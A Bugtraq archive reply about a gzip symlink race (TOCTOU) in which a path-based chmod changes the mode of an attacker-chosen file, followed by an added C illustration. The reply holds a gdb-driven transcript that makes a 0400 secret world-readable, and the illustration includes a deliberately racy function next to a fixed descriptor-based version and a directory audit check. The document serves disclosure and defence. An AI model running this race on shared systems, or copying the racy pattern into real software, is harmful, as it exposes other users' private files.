Bugtraq mailing list archives
Re: gzip TOCTOU file-permissions vulnerability
From: Joey Hess <joeyh () debian org>
Date: Wed, 13 Apr 2005 11:40:49 -0400
Martin Pitt wrote:
> Of course the file can be removed by other users after gunzip has finished, but that is not a gzip bug, but the result of the really dumb idea to have a group/world-writeable directory without the sticky bit.
It may be really dumb, but it's pretty common practice too. Group-writable directories are often made setgid but I've never seen one made sticky. There's probably a lot of documentation that presents this as best practice if you trust your group members with access to files in the directory, and likely none of it mentions this kind of security issue. Just a few examples within the Debian project (since this is CCed to the Debian bts):

joeyh@haydn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld .
drwxrwsr-x 4 dummy d-i 4096 Jan 18 12:51 ./
joeyh@gluck:/org/cdimage.debian.org/www>ls -ld .
drwxrwsr-x 4 manty debian-c 4096 Apr 7 09:11 ./
joeyh@merkel:/org/bugs.debian.org/spool>ls -ld .
drwxrwsr-x 4 debbugs debbugs 4096 Apr 13 09:19 ./

(gzip is not typically run in any of these directories AFAIK, FWIW).
> Maybe I understood you wrong, could you please give a small test case which describes the vulnerability exactly?
I'm a wimp, so I will use gdb instead of writing some real exploit to win the race.

joey@dragon:~/tmp/gzip-1.3.5>chmod 777 .
joey@dragon:~/tmp/gzip-1.3.5>echo secret > ~/secret
joey@dragon:~/tmp/gzip-1.3.5>chmod 400 ~/secret
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r-------- 1 joey joey 7 Apr 13 11:32 /home/joey/secret
joey@dragon:~/tmp/gzip-1.3.5>gdb ./gzip
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".
(gdb) b copy_stat
Breakpoint 1 at 0x804ca19: file gzip.c, line 1725.
(gdb) run -9 COPYING
Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING
Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725
1725        if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) {
(gdb)
zsh: suspended  gdb ./gzip
joey@dragon:~/tmp/gzip-1.3.5>ls -l COPYING.gz
-rw------- 1 joey joey 6853 Apr 13 11:28 COPYING.gz
joey@dragon:~/tmp/gzip-1.3.5>sudo su nobody
Password:
sh-3.00$ ln -s ~joey/secret COPYING.gz
sh-3.00$ cat COPYING.gz
cat: COPYING.gz: Permission denied
dragon%
zsh: exit 1     sudo su nobody
joey@dragon:~/tmp/gzip-1.3.5>fg
[2]  - continued  gdb ./gzip
c
Continuing.
Program exited normally.
(gdb) quit
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r--r--r-- 1 joey joey 7 Jan 12  1999 /home/joey/secret

-- 
see shy jo
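Added illustration for readers of this archive page; it is neither gzip's code nor anything posted in the thread. It puts the pattern the gdb transcript exercises (output permissions applied by path name, so chmod(2) follows a symlink that another writer to the directory planted at that name) next to the descriptor-based form that closes the window, and adds the directory check implied by Martin Pitt's remark about writable directories without the sticky bit. The function names, the scratch directory under /tmp and the sample modes are this example's own choices, not gzip's.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Racy pattern, as in the transcript: the output is created, then its mode is
 * set by *name*. chmod(2) follows symlinks, so if another writer to the
 * directory swaps the name for a symlink in between, the mode lands on the
 * symlink's target instead of the output file. */
int copy_perms_by_path(const char *out_path, const struct stat *in_st)
{
    return chmod(out_path, in_st->st_mode & 07777);
}

/* Fixed pattern: O_EXCL|O_NOFOLLOW makes open(2) fail with EEXIST if anything
 * (a symlink included) already sits at that name, and fchmod(2) applies the
 * mode to the inode we opened, so a later swap of the name cannot redirect it.
 * Returns the open descriptor, or -1 with errno set. */
int create_output_safely(const char *out_path, const struct stat *in_st)
{
    int fd = open(out_path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fchmod(fd, in_st->st_mode & 07777) < 0) {
        int saved = errno;
        close(fd);
        unlink(out_path);
        errno = saved;
        return -1;
    }
    return fd;
}

/* Audit check behind the sticky-bit remark: a group- or world-writable
 * directory without the sticky bit lets any writer unlink or rename files
 * owned by others. Returns 1 if unsafe, 0 if not, -1 on error. */
int dir_is_unsafe_shared(const char *dir)
{
    struct stat st;
    if (lstat(dir, &st) < 0 || !S_ISDIR(st.st_mode))
        return -1;
    int writable_by_others = (st.st_mode & (S_IWGRP | S_IWOTH)) != 0;
    int sticky = (st.st_mode & S_ISVTX) != 0;
    return writable_by_others && !sticky;
}

/* Constructed scenario in a scratch directory (this example's own, not from
 * the thread), mirroring the transcript: a 0400 "secret" and an output name
 * replaced by a symlink to it. Returns a bitmask; 15 means all four held:
 *   1  path-based chmod through the symlink changed the victim file's mode
 *   2  fd-based creation refused the symlinked output name (EEXIST)
 *   4  the directory at 0777 is flagged as unsafe
 *   8  the same directory at 01777 (sticky) is not flagged */
int run_demo(void)
{
    char dir[64], secret[128], out[128];
    struct stat in_st, st;
    int result = 0, fd;
    snprintf(dir, sizeof dir, "/tmp/gzrace.%ld", (long)getpid());
    snprintf(secret, sizeof secret, "%s/secret", dir);
    snprintf(out, sizeof out, "%s/out.gz", dir);
    if (mkdir(dir, 0700) < 0)
        return -1;
    /* the victim file: 0400, like ~/secret in the transcript */
    fd = open(secret, O_WRONLY | O_CREAT | O_EXCL, 0400);
    if (fd < 0 || write(fd, "secret\n", 7) != 7)
        return -1;
    close(fd);
    if (symlink(secret, out) < 0)     /* the output name now points at the victim */
        return -1;
    memset(&in_st, 0, sizeof in_st);  /* pretend the input file was 0644 */
    in_st.st_mode = S_IFREG | 0644;
    if (copy_perms_by_path(out, &in_st) == 0 &&
        stat(secret, &st) == 0 && (st.st_mode & 07777) == 0644)
        result |= 1;
    if (create_output_safely(out, &in_st) < 0 && errno == EEXIST)
        result |= 2;
    if (chmod(dir, 0777) == 0 && dir_is_unsafe_shared(dir) == 1)
        result |= 4;
    if (chmod(dir, 01777) == 0 && dir_is_unsafe_shared(dir) == 0)
        result |= 8;
    unlink(out);
    unlink(secret);
    rmdir(dir);
    return result;
}

int main(void)
{
    int r = run_demo();
    printf("demo result: %d (15 = all four behaviours observed)\n", r);
    return r == 15 ? 0 : 1;
}
```

Build with `cc -Wall -o gzrace gzrace.c && ./gzrace`. The point of the descriptor-based variant is that every metadata operation (fchmod, and likewise fchown or futimens) is applied to the inode that open(2) returned, so nothing another process does to the directory entry after that can move the change onto a different file; the directory check is the same test one would run with `find` over shared trees like the ones listed above, looking for mode bits g+w or o+w without t.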